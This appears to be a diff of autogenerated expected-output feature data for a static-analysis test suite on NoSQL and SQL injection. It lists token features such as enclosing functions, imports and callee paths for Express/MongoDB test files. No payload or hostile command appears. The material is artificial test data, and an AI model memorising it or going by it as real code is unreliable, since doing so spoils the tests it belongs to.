autogenerated/NosqlAndSqlInjection/untyped/mongodb_bodySafe.js:25:5:30:6 | exceptional return of MongoCl ... \\n }) | enclosingFunctionName | app.post#functionalargument | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb_bodySafe.js:25:5:30:6 | exceptional return of MongoCl ... \\n }) | fileImports | body-parser express mongodb | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb_bodySafe.js:25:17:25:23 | connect | contextFunctionInterfaces | | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb_bodySafe.js:25:17:25:23 | connect | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb_bodySafe.js:25:17:25:23 | connect | enclosingFunctionBody | req res query query title req query title MongoClient connect mongodb://localhost:27017/test err db doc db collection doc doc find query | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb_bodySafe.js:25:17:25:23 | connect | enclosingFunctionName | app.post#functionalargument | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb_bodySafe.js:25:17:25:23 | connect | fileImports | body-parser express mongodb | | autogenerated/NosqlAndSqlInjection/untyped/mongodb_bodySafe.js:25:25:25:56 | 'mongod ... 7/test' | CalleeFlexibleAccessPath | MongoClient.connect | | autogenerated/NosqlAndSqlInjection/untyped/mongodb_bodySafe.js:25:25:25:56 | 'mongod ... 7/test' | InputArgumentIndex | 0 | | autogenerated/NosqlAndSqlInjection/untyped/mongodb_bodySafe.js:25:25:25:56 | 'mongod ... 7/test' | calleeImports | mongodb | @@ -2107,6 +11375,16 @@ tokenFeatures | autogenerated/NosqlAndSqlInjection/untyped/mongodb_bodySafe.js:25:25:25:56 | 'mongod ... 7/test' | enclosingFunctionName | app.post#functionalargument | | autogenerated/NosqlAndSqlInjection/untyped/mongodb_bodySafe.js:25:25:25:56 | 'mongod ... 7/test' | fileImports | body-parser express mongodb | | autogenerated/NosqlAndSqlInjection/untyped/mongodb_bodySafe.js:25:25:25:56 | 'mongod ... 7/test' | receiverName | MongoClient | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb_bodySafe.js:25:59:25:58 | query | contextFunctionInterfaces | | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb_bodySafe.js:25:59:25:58 | query | contextSurroundingFunctionParameters | | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb_bodySafe.js:25:59:25:58 | query | enclosingFunctionBody | req res query query title req query title MongoClient connect mongodb://localhost:27017/test err db doc db collection doc doc find query | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb_bodySafe.js:25:59:25:58 | query | enclosingFunctionName | app.post#functionalargument | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb_bodySafe.js:25:59:25:58 | query | fileImports | body-parser express mongodb | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb_bodySafe.js:25:59:30:5 | 'arguments' object of anonymous function | contextFunctionInterfaces | | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb_bodySafe.js:25:59:30:5 | 'arguments' object of anonymous function | contextSurroundingFunctionParameters | | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb_bodySafe.js:25:59:30:5 | 'arguments' object of anonymous function | enclosingFunctionBody | req res query query title req query title MongoClient connect mongodb://localhost:27017/test err db doc db collection doc doc find query | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb_bodySafe.js:25:59:30:5 | 'arguments' object of anonymous function | enclosingFunctionName | app.post#functionalargument | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb_bodySafe.js:25:59:30:5 | 'arguments' object of anonymous function | fileImports | body-parser express mongodb | | autogenerated/NosqlAndSqlInjection/untyped/mongodb_bodySafe.js:25:59:30:5 | (err, d ... ;\\n } | CalleeFlexibleAccessPath | MongoClient.connect | | autogenerated/NosqlAndSqlInjection/untyped/mongodb_bodySafe.js:25:59:30:5 | (err, d ... ;\\n } | InputArgumentIndex | 1 | | autogenerated/NosqlAndSqlInjection/untyped/mongodb_bodySafe.js:25:59:30:5 | (err, d ... ;\\n } | calleeImports | mongodb | @@ -2116,6 +11394,71 @@ tokenFeatures | autogenerated/NosqlAndSqlInjection/untyped/mongodb_bodySafe.js:25:59:30:5 | (err, d ... ;\\n } | enclosingFunctionName | app.post#functionalargument | | autogenerated/NosqlAndSqlInjection/untyped/mongodb_bodySafe.js:25:59:30:5 | (err, d ... ;\\n } | fileImports | body-parser express mongodb | | autogenerated/NosqlAndSqlInjection/untyped/mongodb_bodySafe.js:25:59:30:5 | (err, d ... ;\\n } | receiverName | MongoClient | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb_bodySafe.js:25:59:30:5 | exceptional return of anonymous function | contextFunctionInterfaces | | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb_bodySafe.js:25:59:30:5 | exceptional return of anonymous function | contextSurroundingFunctionParameters | | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb_bodySafe.js:25:59:30:5 | exceptional return of anonymous function | enclosingFunctionBody | req res query query title req query title MongoClient connect mongodb://localhost:27017/test err db doc db collection doc doc find query | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb_bodySafe.js:25:59:30:5 | exceptional return of anonymous function | enclosingFunctionName | app.post#functionalargument | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb_bodySafe.js:25:59:30:5 | exceptional return of anonymous function | fileImports | body-parser express mongodb | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb_bodySafe.js:25:59:30:5 | return of anonymous function | contextFunctionInterfaces | | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb_bodySafe.js:25:59:30:5 | return of anonymous function | contextSurroundingFunctionParameters | | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb_bodySafe.js:25:59:30:5 | return of anonymous function | enclosingFunctionBody | req res query query title req query title MongoClient connect mongodb://localhost:27017/test err db doc db collection doc doc find query | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb_bodySafe.js:25:59:30:5 | return of anonymous function | enclosingFunctionName | app.post#functionalargument | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb_bodySafe.js:25:59:30:5 | return of anonymous function | fileImports | body-parser express mongodb | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb_bodySafe.js:25:60:25:62 | err | contextFunctionInterfaces | | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb_bodySafe.js:25:60:25:62 | err | contextSurroundingFunctionParameters | (req, res)\n(err, db) | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb_bodySafe.js:25:60:25:62 | err | enclosingFunctionBody | req res query query title req query title MongoClient connect mongodb://localhost:27017/test err db doc db collection doc doc find query | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb_bodySafe.js:25:60:25:62 | err | enclosingFunctionName | app.post#functionalargument | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb_bodySafe.js:25:60:25:62 | err | fileImports | body-parser express mongodb | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb_bodySafe.js:25:65:25:66 | db | contextFunctionInterfaces | | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb_bodySafe.js:25:65:25:66 | db | contextFunctionInterfaces | | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb_bodySafe.js:25:65:25:66 | db | contextSurroundingFunctionParameters | | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb_bodySafe.js:25:65:25:66 | db | contextSurroundingFunctionParameters | (req, res)\n(err, db) | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb_bodySafe.js:25:65:25:66 | db | enclosingFunctionBody | req res query query title req query title MongoClient connect mongodb://localhost:27017/test err db doc db collection doc doc find query | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb_bodySafe.js:25:65:25:66 | db | enclosingFunctionBody | req res query query title req query title MongoClient connect mongodb://localhost:27017/test err db doc db collection doc doc find query | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb_bodySafe.js:25:65:25:66 | db | enclosingFunctionName | app.post#functionalargument | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb_bodySafe.js:25:65:25:66 | db | enclosingFunctionName | app.post#functionalargument | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb_bodySafe.js:25:65:25:66 | db | fileImports | body-parser express mongodb | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb_bodySafe.js:25:65:25:66 | db | fileImports | body-parser express mongodb | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb_bodySafe.js:26:11:26:13 | doc | contextFunctionInterfaces | | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb_bodySafe.js:26:11:26:13 | doc | contextSurroundingFunctionParameters | (req, res)\n(err, db) | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb_bodySafe.js:26:11:26:13 | doc | enclosingFunctionBody | req res query query title req query title MongoClient connect mongodb://localhost:27017/test err db doc db collection doc doc find query | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb_bodySafe.js:26:11:26:13 | doc | enclosingFunctionName | app.post#functionalargument | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb_bodySafe.js:26:11:26:13 | doc | fileImports | body-parser express mongodb | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb_bodySafe.js:26:11:26:36 | doc | contextFunctionInterfaces | | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb_bodySafe.js:26:11:26:36 | doc | contextSurroundingFunctionParameters | | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb_bodySafe.js:26:11:26:36 | doc | enclosingFunctionBody | req res query query title req query title MongoClient connect mongodb://localhost:27017/test err db doc db collection doc doc find query | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb_bodySafe.js:26:11:26:36 | doc | enclosingFunctionName | app.post#functionalargument | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb_bodySafe.js:26:11:26:36 | doc | fileImports | body-parser express mongodb | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb_bodySafe.js:26:11:26:36 | doc = d ... ('doc') | contextFunctionInterfaces | | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb_bodySafe.js:26:11:26:36 | doc = d ... ('doc') | contextSurroundingFunctionParameters | (req, res)\n(err, db) | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb_bodySafe.js:26:11:26:36 | doc = d ... ('doc') | enclosingFunctionBody | req res query query title req query title MongoClient connect mongodb://localhost:27017/test err db doc db collection doc doc find query | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb_bodySafe.js:26:11:26:36 | doc = d ... ('doc') | enclosingFunctionName | app.post#functionalargument | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb_bodySafe.js:26:11:26:36 | doc = d ... ('doc') | fileImports | body-parser express mongodb | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb_bodySafe.js:26:17:26:18 | db | contextFunctionInterfaces | | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb_bodySafe.js:26:17:26:18 | db | contextSurroundingFunctionParameters | (req, res)\n(err, db) | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb_bodySafe.js:26:17:26:18 | db | enclosingFunctionBody | req res query query title req query title MongoClient connect mongodb://localhost:27017/test err db doc db collection doc doc find query | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb_bodySafe.js:26:17:26:18 | db | enclosingFunctionName | app.post#functionalargument | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb_bodySafe.js:26:17:26:18 | db | fileImports | body-parser express mongodb | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb_bodySafe.js:26:17:26:29 | db.collection | contextFunctionInterfaces | | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb_bodySafe.js:26:17:26:29 | db.collection | contextSurroundingFunctionParameters | (req, res)\n(err, db) | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb_bodySafe.js:26:17:26:29 | db.collection | enclosingFunctionBody | req res query query title req query title MongoClient connect mongodb://localhost:27017/test err db doc db collection doc doc find query | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb_bodySafe.js:26:17:26:29 | db.collection | enclosingFunctionName | app.post#functionalargument | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb_bodySafe.js:26:17:26:29 | db.collection | fileImports | body-parser express mongodb | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb_bodySafe.js:26:17:26:36 | db.collection('doc') | contextFunctionInterfaces | | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb_bodySafe.js:26:17:26:36 | db.collection('doc') | contextSurroundingFunctionParameters | (req, res)\n(err, db) | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb_bodySafe.js:26:17:26:36 | db.collection('doc') | enclosingFunctionBody | req res query query title req query title MongoClient connect mongodb://localhost:27017/test err db doc db collection doc doc find query | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb_bodySafe.js:26:17:26:36 | db.collection('doc') | enclosingFunctionName | app.post#functionalargument | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb_bodySafe.js:26:17:26:36 | db.collection('doc') | fileImports | body-parser express mongodb | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb_bodySafe.js:26:17:26:36 | exceptional return of db.collection('doc') | contextFunctionInterfaces | | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb_bodySafe.js:26:17:26:36 | exceptional return of db.collection('doc') | contextSurroundingFunctionParameters | | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb_bodySafe.js:26:17:26:36 | exceptional return of db.collection('doc') | enclosingFunctionBody | req res query query title req query title MongoClient connect mongodb://localhost:27017/test err db doc db collection doc doc find query | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb_bodySafe.js:26:17:26:36 | exceptional return of db.collection('doc') | enclosingFunctionName | app.post#functionalargument | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb_bodySafe.js:26:17:26:36 | exceptional return of db.collection('doc') | fileImports | body-parser express mongodb | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb_bodySafe.js:26:20:26:29 | collection | contextFunctionInterfaces | | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb_bodySafe.js:26:20:26:29 | collection | contextSurroundingFunctionParameters | (req, res)\n(err, db) | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb_bodySafe.js:26:20:26:29 | collection | enclosingFunctionBody | req res query query title req query title MongoClient connect mongodb://localhost:27017/test err db doc db collection doc doc find query | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb_bodySafe.js:26:20:26:29 | collection | enclosingFunctionName | app.post#functionalargument | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb_bodySafe.js:26:20:26:29 | collection | fileImports | body-parser express mongodb | | autogenerated/NosqlAndSqlInjection/untyped/mongodb_bodySafe.js:26:31:26:35 | 'doc' | CalleeFlexibleAccessPath | db.collection | | autogenerated/NosqlAndSqlInjection/untyped/mongodb_bodySafe.js:26:31:26:35 | 'doc' | InputArgumentIndex | 0 | | autogenerated/NosqlAndSqlInjection/untyped/mongodb_bodySafe.js:26:31:26:35 | 'doc' | contextFunctionInterfaces | | @@ -2124,6 +11467,31 @@ tokenFeatures | autogenerated/NosqlAndSqlInjection/untyped/mongodb_bodySafe.js:26:31:26:35 | 'doc' | enclosingFunctionName | app.post#functionalargument | | autogenerated/NosqlAndSqlInjection/untyped/mongodb_bodySafe.js:26:31:26:35 | 'doc' | fileImports | body-parser express mongodb | | autogenerated/NosqlAndSqlInjection/untyped/mongodb_bodySafe.js:26:31:26:35 | 'doc' | receiverName | db | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb_bodySafe.js:29:7:29:9 | doc | contextFunctionInterfaces | | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb_bodySafe.js:29:7:29:9 | doc | contextSurroundingFunctionParameters | (req, res)\n(err, db) | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb_bodySafe.js:29:7:29:9 | doc | enclosingFunctionBody | req res query query title req query title MongoClient connect mongodb://localhost:27017/test err db doc db collection doc doc find query | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb_bodySafe.js:29:7:29:9 | doc | enclosingFunctionName | app.post#functionalargument | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb_bodySafe.js:29:7:29:9 | doc | fileImports | body-parser express mongodb | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb_bodySafe.js:29:7:29:14 | doc.find | contextFunctionInterfaces | | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb_bodySafe.js:29:7:29:14 | doc.find | contextSurroundingFunctionParameters | (req, res)\n(err, db) | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb_bodySafe.js:29:7:29:14 | doc.find | enclosingFunctionBody | req res query query title req query title MongoClient connect mongodb://localhost:27017/test err db doc db collection doc doc find query | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb_bodySafe.js:29:7:29:14 | doc.find | enclosingFunctionName | app.post#functionalargument | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb_bodySafe.js:29:7:29:14 | doc.find | fileImports | body-parser express mongodb | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb_bodySafe.js:29:7:29:21 | doc.find(query) | contextFunctionInterfaces | | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb_bodySafe.js:29:7:29:21 | doc.find(query) | contextSurroundingFunctionParameters | (req, res)\n(err, db) | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb_bodySafe.js:29:7:29:21 | doc.find(query) | enclosingFunctionBody | req res query query title req query title MongoClient connect mongodb://localhost:27017/test err db doc db collection doc doc find query | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb_bodySafe.js:29:7:29:21 | doc.find(query) | enclosingFunctionName | app.post#functionalargument | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb_bodySafe.js:29:7:29:21 | doc.find(query) | fileImports | body-parser express mongodb | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb_bodySafe.js:29:7:29:21 | exceptional return of doc.find(query) | contextFunctionInterfaces | | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb_bodySafe.js:29:7:29:21 | exceptional return of doc.find(query) | contextSurroundingFunctionParameters | | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb_bodySafe.js:29:7:29:21 | exceptional return of doc.find(query) | enclosingFunctionBody | req res query query title req query title MongoClient connect mongodb://localhost:27017/test err db doc db collection doc doc find query | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb_bodySafe.js:29:7:29:21 | exceptional return of doc.find(query) | enclosingFunctionName | app.post#functionalargument | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb_bodySafe.js:29:7:29:21 | exceptional return of doc.find(query) | fileImports | body-parser express mongodb | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb_bodySafe.js:29:11:29:14 | find | contextFunctionInterfaces | | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb_bodySafe.js:29:11:29:14 | find | contextSurroundingFunctionParameters | (req, res)\n(err, db) | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb_bodySafe.js:29:11:29:14 | find | enclosingFunctionBody | req res query query title req query title MongoClient connect mongodb://localhost:27017/test err db doc db collection doc doc find query | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb_bodySafe.js:29:11:29:14 | find | enclosingFunctionName | app.post#functionalargument | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb_bodySafe.js:29:11:29:14 | find | fileImports | body-parser express mongodb | | autogenerated/NosqlAndSqlInjection/untyped/mongodb_bodySafe.js:29:16:29:20 | query | CalleeFlexibleAccessPath | doc.find | | autogenerated/NosqlAndSqlInjection/untyped/mongodb_bodySafe.js:29:16:29:20 | query | InputArgumentIndex | 0 | | autogenerated/NosqlAndSqlInjection/untyped/mongodb_bodySafe.js:29:16:29:20 | query | contextFunctionInterfaces | | @@ -2132,24 +11500,131 @@ tokenFeatures | autogenerated/NosqlAndSqlInjection/untyped/mongodb_bodySafe.js:29:16:29:20 | query | enclosingFunctionName | app.post#functionalargument | | autogenerated/NosqlAndSqlInjection/untyped/mongodb_bodySafe.js:29:16:29:20 | query | fileImports | body-parser express mongodb | | autogenerated/NosqlAndSqlInjection/untyped/mongodb_bodySafe.js:29:16:29:20 | query | receiverName | doc | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:1:1:1:0 | this | contextFunctionInterfaces | getQueryConstructor()\ninnocent(X, Y, query) | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:1:1:1:0 | this | contextSurroundingFunctionParameters | | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:1:1:1:0 | this | fileImports | body-parser express mongoose | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:1:1:1:1 | Document | contextFunctionInterfaces | getQueryConstructor()\ninnocent(X, Y, query) | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:1:1:1:1 | Document | contextSurroundingFunctionParameters | | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:1:1:1:1 | Document | fileImports | body-parser express mongoose | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:1:1:1:1 | Mongoose | contextFunctionInterfaces | getQueryConstructor()\ninnocent(X, Y, query) | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:1:1:1:1 | Mongoose | contextSurroundingFunctionParameters | | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:1:1:1:1 | Mongoose | fileImports | body-parser express mongoose | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:1:1:1:1 | require | contextFunctionInterfaces | getQueryConstructor()\ninnocent(X, Y, query) | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:1:1:1:1 | require | contextSurroundingFunctionParameters | | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:1:1:1:1 | require | fileImports | body-parser express mongoose | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:1:1:1:12 | 'use strict' | contextFunctionInterfaces | getQueryConstructor()\ninnocent(X, Y, query) | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:1:1:1:12 | 'use strict' | contextSurroundingFunctionParameters | | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:1:1:1:12 | 'use strict' | fileImports | body-parser express mongoose | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:2:7:2:13 | Express | contextFunctionInterfaces | getQueryConstructor()\ninnocent(X, Y, query) | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:2:7:2:13 | Express | contextSurroundingFunctionParameters | | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:2:7:2:13 | Express | fileImports | body-parser express mongoose | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:2:7:2:34 | Express | contextFunctionInterfaces | getQueryConstructor()\ninnocent(X, Y, query) | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:2:7:2:34 | Express | contextSurroundingFunctionParameters | | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:2:7:2:34 | Express | fileImports | body-parser express mongoose | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:2:7:2:34 | Express ... press') | contextFunctionInterfaces | getQueryConstructor()\ninnocent(X, Y, query) | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:2:7:2:34 | Express ... press') | contextSurroundingFunctionParameters | | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:2:7:2:34 | Express ... press') | fileImports | body-parser express mongoose | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:2:17:2:23 | require | contextFunctionInterfaces | getQueryConstructor()\ninnocent(X, Y, query) | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:2:17:2:23 | require | contextSurroundingFunctionParameters | | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:2:17:2:23 | require | fileImports | body-parser express mongoose | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:2:17:2:34 | exceptional return of require('express') | contextFunctionInterfaces | getQueryConstructor()\ninnocent(X, Y, query) | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:2:17:2:34 | exceptional return of require('express') | contextSurroundingFunctionParameters | | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:2:17:2:34 | exceptional return of require('express') | fileImports | body-parser express mongoose | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:2:17:2:34 | require('express') | contextFunctionInterfaces | getQueryConstructor()\ninnocent(X, Y, query) | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:2:17:2:34 | require('express') | contextSurroundingFunctionParameters | | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:2:17:2:34 | require('express') | fileImports | body-parser express mongoose | | autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:2:25:2:33 | 'express' | CalleeFlexibleAccessPath | require | | autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:2:25:2:33 | 'express' | InputArgumentIndex | 0 | | autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:2:25:2:33 | 'express' | calleeImports | | | autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:2:25:2:33 | 'express' | contextFunctionInterfaces | getQueryConstructor()\ninnocent(X, Y, query) | | autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:2:25:2:33 | 'express' | contextSurroundingFunctionParameters | | | autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:2:25:2:33 | 'express' | fileImports | body-parser express mongoose | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:3:7:3:16 | BodyParser | contextFunctionInterfaces | getQueryConstructor()\ninnocent(X, Y, query) | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:3:7:3:16 | BodyParser | contextSurroundingFunctionParameters | | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:3:7:3:16 | BodyParser | fileImports | body-parser express mongoose | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:3:7:3:41 | BodyPar ... arser') | contextFunctionInterfaces | getQueryConstructor()\ninnocent(X, Y, query) | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:3:7:3:41 | BodyPar ... arser') | contextSurroundingFunctionParameters | | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:3:7:3:41 | BodyPar ... arser') | fileImports | body-parser express mongoose | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:3:7:3:41 | BodyParser | contextFunctionInterfaces | getQueryConstructor()\ninnocent(X, Y, query) | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:3:7:3:41 | BodyParser | contextSurroundingFunctionParameters | | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:3:7:3:41 | BodyParser | fileImports | body-parser express mongoose | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:3:20:3:26 | require | contextFunctionInterfaces | getQueryConstructor()\ninnocent(X, Y, query) | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:3:20:3:26 | require | contextSurroundingFunctionParameters | | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:3:20:3:26 | require | fileImports | body-parser express mongoose | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:3:20:3:41 | exceptional return of require ... arser') | contextFunctionInterfaces | getQueryConstructor()\ninnocent(X, Y, query) | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:3:20:3:41 | exceptional return of require ... arser') | contextSurroundingFunctionParameters | | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:3:20:3:41 | exceptional return of require ... arser') | fileImports | body-parser express mongoose | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:3:20:3:41 | require ... arser') | contextFunctionInterfaces | getQueryConstructor()\ninnocent(X, Y, query) | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:3:20:3:41 | require ... arser') | contextSurroundingFunctionParameters | | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:3:20:3:41 | require ... arser') | fileImports | body-parser express mongoose | | autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:3:28:3:40 | 'body-parser' | CalleeFlexibleAccessPath | require | | autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:3:28:3:40 | 'body-parser' | InputArgumentIndex | 0 | | autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:3:28:3:40 | 'body-parser' | calleeImports | | | autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:3:28:3:40 | 'body-parser' | contextFunctionInterfaces | getQueryConstructor()\ninnocent(X, Y, query) | | autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:3:28:3:40 | 'body-parser' | contextSurroundingFunctionParameters | | | autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:3:28:3:40 | 'body-parser' | fileImports | body-parser express mongoose | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:4:7:4:14 | Mongoose | contextFunctionInterfaces | getQueryConstructor()\ninnocent(X, Y, query) | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:4:7:4:14 | Mongoose | contextSurroundingFunctionParameters | | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:4:7:4:14 | Mongoose | contextSurroundingFunctionParameters | | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:4:7:4:14 | Mongoose | fileImports | body-parser express mongoose | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:4:7:4:36 | Mongoos ... goose') | contextFunctionInterfaces | getQueryConstructor()\ninnocent(X, Y, query) | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:4:7:4:36 | Mongoos ... goose') | contextSurroundingFunctionParameters | | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:4:7:4:36 | Mongoos ... goose') | fileImports | body-parser express mongoose | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:4:7:4:36 | Mongoose | contextFunctionInterfaces | getQueryConstructor()\ninnocent(X, Y, query) | +| 